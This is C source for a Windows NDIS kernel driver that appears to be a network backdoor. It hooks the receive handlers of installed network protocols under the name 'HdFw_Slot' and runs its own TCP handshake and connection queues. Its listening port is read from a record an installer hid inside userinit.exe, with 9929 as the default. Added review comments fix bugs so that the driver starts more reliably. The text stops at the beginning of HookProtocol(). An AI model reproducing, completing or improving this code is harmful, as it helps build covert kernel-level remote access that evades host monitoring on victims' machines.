///
// uty@uaty
///
#include <ndis.h>
#include "dummyprotocolfunc.h"
#include "structs.h"
// 8-byte record that GetTheListeningPort() reads from byte offset 90 of
// userinit.exe (the installer wrote it there, per the comment in that
// function). The port is honoured only when `sign` carries the expected marker.
typedef
struct _SIGNANDPORT{
unsigned int sign; // must equal 0xAABBCCDD for `port` to be used
unsigned int port; // listening port; otherwise the default 9929 applies
}SIGNANDPORT,*PSIGNANDPORT;
//not used
/*
typedef
struct _SYNACKPACKET{
ULONG sign;
ULONG BufferAddress;
}SYNACKPACKET,*PSYNACKPACKET;
*/
//
// Local copy of the Windows OSVERSIONINFOEXW / RTL_OSVERSIONINFOEXW layout.
// GetTheListeningPort() fills it through RtlGetVersion() to choose between
// \WINNT and \WINDOWS. NOTE(review): presumably redefined here because this
// file includes <ndis.h> only and not the ntddk.h definition — confirm the
// field layout matches the SDK headers for the targeted build.
typedef struct _OSVERSIONINFOEXW {
ULONG dwOSVersionInfoSize; // caller sets this to sizeof the structure before RtlGetVersion
ULONG dwMajorVersion;
ULONG dwMinorVersion;
ULONG dwBuildNumber;
ULONG dwPlatformId;
WCHAR szCSDVersion[ 128 ]; // Maintenance string for PSS usage
USHORT wServicePackMajor;
USHORT wServicePackMinor;
USHORT wSuiteMask;
UCHAR wProductType;
UCHAR wReserved;
} OSVERSIONINFOEXW, *POSVERSIONINFOEXW, *LPOSVERSIONINFOEXW, RTL_OSVERSIONINFOEXW, *PRTL_OSVERSIONINFOEXW;
// Local copy of the basic OSVERSIONINFOW / RTL_OSVERSIONINFOW layout; it is the
// prefix of _OSVERSIONINFOEXW above, which is why GetTheListeningPort() can cast
// its extended structure to RTL_OSVERSIONINFOW* for the RtlGetVersion() call.
typedef struct _OSVERSIONINFOW {
ULONG dwOSVersionInfoSize;
ULONG dwMajorVersion;
ULONG dwMinorVersion;
ULONG dwBuildNumber;
ULONG dwPlatformId;
WCHAR szCSDVersion[ 128 ]; // Maintenance string for PSS usage
} OSVERSIONINFOW, *POSVERSIONINFOW, *LPOSVERSIONINFOW, RTL_OSVERSIONINFOW, *PRTL_OSVERSIONINFOW;
//--------------------------------------------------------------------
///mAcros
//#define OURPORT 9929   // superseded: OURPORT is now a run-time global (below) set from GetTheListeningPort()
// Mirrors the Win32 MAX_PATH constant; not referenced in the code of this
// file shown before HookProtocol().
#define MAX_PATH 260
//--------------------------------------------------------------------
////globAl vAr
// Hook-context list head. Not referenced in the visible part of this file;
// presumably maintained by HookNdisFunc()/IsHookedNdisFunc() — confirm.
HOOK_CONTEXT_STRUCT *m_pOurAllOfHookContext = NULL;
// NDIS pools created in InitWorkThreAd(); the packet and buffer below are
// drawn from them.
NDIS_HANDLE m_ourPAcketPoolHAndle = NULL;
NDIS_HANDLE m_ourBufferPoolHAndle = NULL;
//for ProtocolReceive
PNDIS_PACKET m_ourPAcketHAndle = NULL; // single packet; m_ourBufferHAndle is chained at its front in InitWorkThreAd()
PNDIS_BUFFER m_ourBufferHAndle = NULL; // NDIS buffer describing m_ourBuffer
PVOID m_ourBuffer = NULL;              // MAX_PACKET_SIZE bytes allocated with tag 'ytaU'
//
// Allocated from NonPagedPool in InitWorkThreAd(); NULL (zero-initialised)
// until then. The event is initialised as a SynchronizationEvent.
PKEVENT g_puSendEvent;
// Relative timeout of -10000000 (100 ns units, i.e. 1 second), set in InitWorkThreAd().
PLARGE_INTEGER g_pTimeOut;
// Listening port, assigned from GetTheListeningPort() in InitWorkThreAd().
ULONG OURPORT;
//--------------------------------------------------------------------
//defined in ubd_sys.c
// Connection table and receive/send queues owned by ubd_sys.c (see the comment
// above). None of them is referenced in the code of this file shown here.
extern TCPS_Connection g_ConnectionSpAce[MAX_CONNECTIONS];
extern RECVLISTHEAD g_RecvListHeAd;
extern SENDLISTHEAD g_SendListHeAd;
//
//NDIS_HANDLE g_pBindAdaptHandle;
//--------------------------------------------------------------------
////proto function
NTSTATUS
RtlGetVersion(
PRTL_OSVERSIONINFOW lpVersionInformation
);
/////////
VOID
OnUnloAd(
IN PDRIVER_OBJECT DriverObject
);
VOID
HookFuncBlock(
CHAR* ProtocolContent
);
HOOK_CONTEXT_STRUCT*
HookNdisFunc(
PVOID pHookProc,
PVOID *ppOrigProc,
PVOID pBindAdAptHAndle,
PVOID pProtocolContent
);
HOOK_CONTEXT_STRUCT*
IsHookedNdisFunc(
PVOID pAddr
);
HOOK_CONTEXT_STRUCT*
IsHookedNdisFuncEx(
PVOID *pAddr
);
ULONG
HookProtocol(
VOID
);
NDIS_STATUS
HookProtocolReceive(
IN HOOK_CONTEXT_STRUCT *pOurContext,
IN NDIS_HANDLE ProtocolBindingContext,
IN NDIS_HANDLE MAcReceiveContext,
IN PVOID HeAderBuffer,
IN UINT HeAderBufferSize,
IN PVOID LookAheAdBuffer,
IN UINT LookAheAdBufferSize,
IN UINT PAcketSize
);
INT
HookProtocolReceivePAcket(
IN HOOK_CONTEXT_STRUCT *pOurContext,
IN NDIS_HANDLE ProtocolBindingContext,
IN PNDIS_PACKET PAcket
);
VOID
ReAdPAcket(
PNDIS_PACKET PAcket,
PVOID pBuffer,
ULONG ulBufSize
);
ULONG
HAndlePAcket(
HOOK_CONTEXT_STRUCT *pOurContext,
PNDIS_PACKET pPAcket
);
ULONG
HAndleBuffer(
HOOK_CONTEXT_STRUCT *pOurContext,
PVOID pBuffer,
ULONG PAcketSize
);
VOID
HookProtocolSendComplete(
IN HOOK_CONTEXT_STRUCT *pOurContext,
IN NDIS_HANDLE ProtocolBindingContext,
IN PNDIS_PACKET PAcket,
IN NDIS_STATUS StAtus
);
USHORT
checksum(
USHORT *buff,
ULONG size
);
NTSTATUS
SendSYNACKPAcket(
HOOK_CONTEXT_STRUCT *pOurContext,
PVOID pBuffer
);
NTSTATUS
SendACKPAcket(
HOOK_CONTEXT_STRUCT *pOurContext,
PVOID pBuffer
);
NTSTATUS
GetPAcketDAtA(
HOOK_CONTEXT_STRUCT *pOurContext,
PVOID pBuffer
);
NTSTATUS
SendACKPAcketToSendList(
HOOK_CONTEXT_STRUCT *pOurContext,
PVOID pBuffer
);
NTSTATUS
SendSYNACKPAcketToSendList(
HOOK_CONTEXT_STRUCT *pOurContext,
PVOID pBuffer
);
ULONG
HAndleReceivePAcket(
HOOK_CONTEXT_STRUCT *pOurContext,
ULONG TotAlPAcketSize,
PVOID pHeAdBuffer,
ULONG ulHeadSize,
PNDIS_PACKET pPAcket
);
NTSTATUS
TCPS_StArtup(
PDEVICE_OBJECT pDeviceObject
);
NTSTATUS
AddRecvDAtAToList(
PRECVLISTHEAD pRecvListHeAd,
char* dAtA,
ULONG RecvDAtALength,
PTCPS_Connection pConnection
);
PRECVLIST
RemoveRecvDAtAFromList(
PRECVLISTHEAD pRecvListHeAd
);
ULONG
SetConnection(
HOOK_CONTEXT_STRUCT *pOurContext,
PVOID pBuffer
);
NTSTATUS
UpDAteConnection(
HOOK_CONTEXT_STRUCT *pOurContext,
PVOID pBuffer
);
VOID
RemoveSendDAtAFromList(
PSENDLISTHEAD pSendListHeAd
);
NTSTATUS
Disconnect(
HOOK_CONTEXT_STRUCT *pOurContext,
PVOID pBuffer
);
NTSTATUS
SendDisconnectMessAgeToSendlist(
HOOK_CONTEXT_STRUCT *pOurContext,
PVOID pBuffer
);
NTSTATUS
AddSendDAtAToList(
PSENDLISTHEAD pSendListHeAd,
CHAR* dAtA,
ULONG SendDAtALength,
PTCPS_Connection pConnection
);
NTSTATUS
AddSendDAtAToListAtFront(
PSENDLISTHEAD pSendListHeAd,
CHAR* dAtA,
ULONG SendDAtALength,
PTCPS_Connection pConnection
);
NTSTATUS
UpDAteConnectionSYN(
HOOK_CONTEXT_STRUCT *pOurContext,
PVOID pBuffer
);
USHORT
CountChecksum(
PVOID pBuffer
);
ULONG
GetTheListeningPort(
VOID
);
VOID
InitWorkThreAd(
PVOID pContext
);
//--------------------------------------------------------------------
/*
 * DriverUnload routine, registered by DriverEntry(). It is deliberately a
 * no-op in this version (the debug print was commented out).
 *
 * NOTE(review): nothing acquired in InitWorkThreAd() — the NDIS packet and
 * buffer pools, the packet, buffer and memory block, the event and timeout
 * allocations, and the device object — is released here, and the hooks set up
 * by HookProtocol() are not undone in this file. Confirm that unloading the
 * driver is actually safe before relying on this routine.
 */
VOID OnUnloAd( IN PDRIVER_OBJECT DriverObject )
{
    (void)DriverObject;
}
//--------------------------------------------------------------------
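/*
 * Driver entry point. Registers OnUnloAd() as the unload routine and starts a
 * system thread running InitWorkThreAd() with the driver object as its
 * context; all remaining initialisation happens on that thread.
 *
 * Returns STATUS_SUCCESS once the worker thread has been created, otherwise the
 * NTSTATUS reported by PsCreateSystemThread(). The previous version returned
 * FALSE on failure, which is 0 == STATUS_SUCCESS, so a failed thread creation
 * was reported to the I/O manager as success.
 */
NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
{
    NTSTATUS stAtus;
    HANDLE hThreAd;

    (void)RegistryPath; /* not used by this driver */

    DbgPrint("Driver begin!\n");
    DriverObject->DriverUnload = OnUnloAd;

    stAtus = PsCreateSystemThread(&hThreAd,
                                  (ACCESS_MASK)0,
                                  NULL,
                                  (HANDLE)0,
                                  NULL,
                                  InitWorkThreAd,
                                  DriverObject
                                  );
    if (!NT_SUCCESS(stAtus)){
        DbgPrint("error when creAte the threAd\n");
        return stAtus;
    }

    /* The thread ends itself with PsTerminateSystemThread(); the handle would
     * only be needed to wait on it, which this driver never does. Closing it
     * here avoids leaking a handle per driver load. */
    ZwClose(hThreAd);
    return STATUS_SUCCESS;
}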
//--------------------------------------------------------------------
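/*
 * Body of the system thread started by DriverEntry(); pContext is the
 * PDRIVER_OBJECT. Creates the control device \Device\uaty, allocates the
 * event, timeout and NDIS packet/buffer resources used by the receive path,
 * reads the listening port (GetTheListeningPort()), runs TCPS_StArtup() and
 * finally HookProtocol(). The thread always ends in PsTerminateSystemThread()
 * and never returns to the caller.
 *
 * On any failure the resources acquired so far are released in reverse order
 * before the thread exits. Fixes relative to the previous version:
 *  - the results of IoCreateDevice() and of both ExAllocatePool() calls are
 *    checked before the returned objects are used (g_pTimeOut was written
 *    through unconditionally);
 *  - the return value of NdisAllocateMemoryWithTag() is captured — the old
 *    code tested the stale stAtus left by NdisAllocateBufferPool();
 *  - NdisAllocateBuffer() receives the buffer-pool handle, not the still-NULL
 *    buffer handle that was passed in its place.
 */
VOID InitWorkThreAd(PVOID pContext)
{
    PDEVICE_OBJECT pDeviceObject = NULL;
    NTSTATUS stAtus;
    WCHAR deviceNAmeBuffer[] = L"\\Device\\uaty"; /* author's note: name to be changed later */
    UNICODE_STRING deviceNAmeUnicodeString;

    RtlInitUnicodeString(&deviceNAmeUnicodeString, deviceNAmeBuffer);
    stAtus = IoCreateDevice(
        pContext,
        0,                   /* no device extension */
        &deviceNAmeUnicodeString,
        FILE_DEVICE_UNKNOWN,
        0,
        TRUE,
        &pDeviceObject
    );
    if (!NT_SUCCESS(stAtus)) {
        goto InitWorkThreAd_end;
    }

    /* Event and timeout shared with the send path (consumers are elsewhere). */
    g_puSendEvent = ExAllocatePool(NonPagedPool, sizeof(KEVENT));
    if (g_puSendEvent == NULL) {
        goto InitWorkThreAd_delete_device;
    }
    g_pTimeOut = ExAllocatePool(NonPagedPool, sizeof(LARGE_INTEGER));
    if (g_pTimeOut == NULL) {
        goto InitWorkThreAd_free_event;
    }
    /* Relative time in 100 ns units: -10 000 000 == one second from now. */
    g_pTimeOut->QuadPart = -10000000;
    KeInitializeEvent(g_puSendEvent, SynchronizationEvent, FALSE);

    /* NDIS resources for ProtocolReceive: one packet with one chained buffer.
     * Packet pool: 0xFFF descriptors, 0x30 bytes of ProtocolReserved each;
     * buffer pool: 0x30 descriptors. */
    NdisAllocatePacketPool(&stAtus, &m_ourPAcketPoolHAndle, 0xFFF, 0x30);
    if (stAtus != NDIS_STATUS_SUCCESS) {
        goto InitWorkThreAd_free_timeout;
    }
    NdisAllocateBufferPool(&stAtus, &m_ourBufferPoolHAndle, 0x30);
    if (stAtus != NDIS_STATUS_SUCCESS) {
        goto InitWorkThreAd_free_packet_pool;
    }
    stAtus = NdisAllocateMemoryWithTag(&m_ourBuffer, MAX_PACKET_SIZE, 'ytaU');
    if (stAtus != NDIS_STATUS_SUCCESS) {
        goto InitWorkThreAd_free_buffer_pool;
    }
    NdisAllocateBuffer(&stAtus, &m_ourBufferHAndle, m_ourBufferPoolHAndle, m_ourBuffer, MAX_PACKET_SIZE);
    if (stAtus != NDIS_STATUS_SUCCESS) {
        goto InitWorkThreAd_free_memory;
    }
    NdisAllocatePacket(&stAtus, &m_ourPAcketHAndle, m_ourPAcketPoolHAndle);
    if (stAtus != NDIS_STATUS_SUCCESS) {
        goto InitWorkThreAd_free_buffer;
    }
    NdisChainBufferAtFront(m_ourPAcketHAndle, m_ourBufferHAndle);

    /* The port comes from the record the installer wrote into userinit.exe. */
    OURPORT = GetTheListeningPort();
    TCPS_StArtup(pDeviceObject);
    HookProtocol(); /* return value not used */
    goto InitWorkThreAd_end;

    /* Failure ladder: each label undoes the step that precedes it above. */
InitWorkThreAd_free_buffer:
    NdisFreeBuffer(m_ourBufferHAndle);
    m_ourBufferHAndle = NULL;
InitWorkThreAd_free_memory:
    NdisFreeMemory(m_ourBuffer, MAX_PACKET_SIZE, 0);
    m_ourBuffer = NULL;
InitWorkThreAd_free_buffer_pool:
    NdisFreeBufferPool(m_ourBufferPoolHAndle);
    m_ourBufferPoolHAndle = NULL;
InitWorkThreAd_free_packet_pool:
    NdisFreePacketPool(m_ourPAcketPoolHAndle);
    m_ourPAcketPoolHAndle = NULL;
InitWorkThreAd_free_timeout:
    ExFreePool(g_pTimeOut);
    g_pTimeOut = NULL;
InitWorkThreAd_free_event:
    ExFreePool(g_puSendEvent);
    g_puSendEvent = NULL;
InitWorkThreAd_delete_device:
    IoDeleteDevice(pDeviceObject);
InitWorkThreAd_end:
    PsTerminateSystemThread(STATUS_SUCCESS);
    /* PsTerminateSystemThread() does not return; nothing placed here runs. */
}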
//--------------------------------------------------------------------
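/*
 * Returns the port this driver listens on.
 *
 * The installer is expected to have written a SIGNANDPORT record (marker
 * 0xAABBCCDD followed by the port) at byte offset 90 of userinit.exe. The
 * file's path is chosen from the OS version reported by RtlGetVersion():
 * major 4 and 5.0 use \WINNT, 5.1 and later 5.x use \WINDOWS. Any other
 * version, a failed open or read, a short read, or a mismatching marker yields
 * the default port 9929.
 *
 * Fixes relative to the previous version:
 *  - the ZwOpenFile() result is checked before hFile is used (the old code
 *    read from and closed an uninitialised handle when the open failed);
 *  - the file is opened for synchronous I/O (SYNCHRONIZE access plus
 *    FILE_SYNCHRONOUS_IO_NONALERT) so ZwReadFile() cannot return
 *    STATUS_PENDING with the record still unfilled;
 *  - the read is validated through its NTSTATUS and the byte count actually
 *    transferred, not only IoStAtusBlock.Status;
 *  - the port is printed with %u to match its unsigned type.
 */
ULONG GetTheListeningPort(VOID)
{
    const ULONG DefaultPort = 9929;
    RTL_OSVERSIONINFOEXW osversion = {0};
    UNICODE_STRING pAth;
    SIGNANDPORT SignAndPort = {0};
    OBJECT_ATTRIBUTES oA;
    HANDLE hFile = NULL;
    NTSTATUS stAtus;
    IO_STATUS_BLOCK IoStAtusBlock;
    LARGE_INTEGER ByteOffset;

    osversion.dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOEXW);
    RtlGetVersion((RTL_OSVERSIONINFOW*)&osversion);
    if (osversion.dwMajorVersion == 4) {
        RtlInitUnicodeString(&pAth, L"\\??\\C:\\WINNT\\System32\\userinit.exe");
    } else if (osversion.dwMajorVersion == 5) {
        if (osversion.dwMinorVersion >= 1) {
            RtlInitUnicodeString(&pAth, L"\\??\\C:\\WINDOWS\\System32\\userinit.exe");
        } else {
            RtlInitUnicodeString(&pAth, L"\\??\\C:\\WINNT\\System32\\userinit.exe");
        }
    } else {
        /* unsupported OS version: no known file location */
        return DefaultPort;
    }

    InitializeObjectAttributes(&oA, &pAth, OBJ_CASE_INSENSITIVE, NULL, NULL);
    stAtus = ZwOpenFile(
        &hFile,
        GENERIC_READ | SYNCHRONIZE,
        &oA,
        &IoStAtusBlock,
        FILE_SHARE_READ,
        FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT
    );
    if (!NT_SUCCESS(stAtus)) {
        return DefaultPort;
    }

    ByteOffset.HighPart = 0;
    ByteOffset.LowPart = 90; /* fixed offset chosen by the installer */
    stAtus = ZwReadFile(
        hFile,
        NULL,
        NULL,
        NULL,
        &IoStAtusBlock,
        &SignAndPort,
        sizeof(SIGNANDPORT),
        &ByteOffset,
        NULL
    );
    ZwClose(hFile);
    if (!NT_SUCCESS(stAtus) || IoStAtusBlock.Information < sizeof(SIGNANDPORT)) {
        return DefaultPort;
    }

    DbgPrint("listening on port %u\n", SignAndPort.port);
    /* Only trust the stored port when the marker the installer wrote is present. */
    return (SignAndPort.sign == 0xAABBCCDD) ? SignAndPort.port : DefaultPort;
}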
//--------------------------------------------------------------------
ULONG HookProtocol(VOID)
{
NDIS_PROTOCOL_CHARACTERISTICS ourNPC;
NDIS_STRING protoNAme = NDIS_STRING_CONST("HdFw_Slot");
NDIS_STATUS StAtus;
NDIS_HANDLE ourProtocolHAndle = NULL;
CHAR* ProtocolChAin;
ULONG offset;
ULONG len;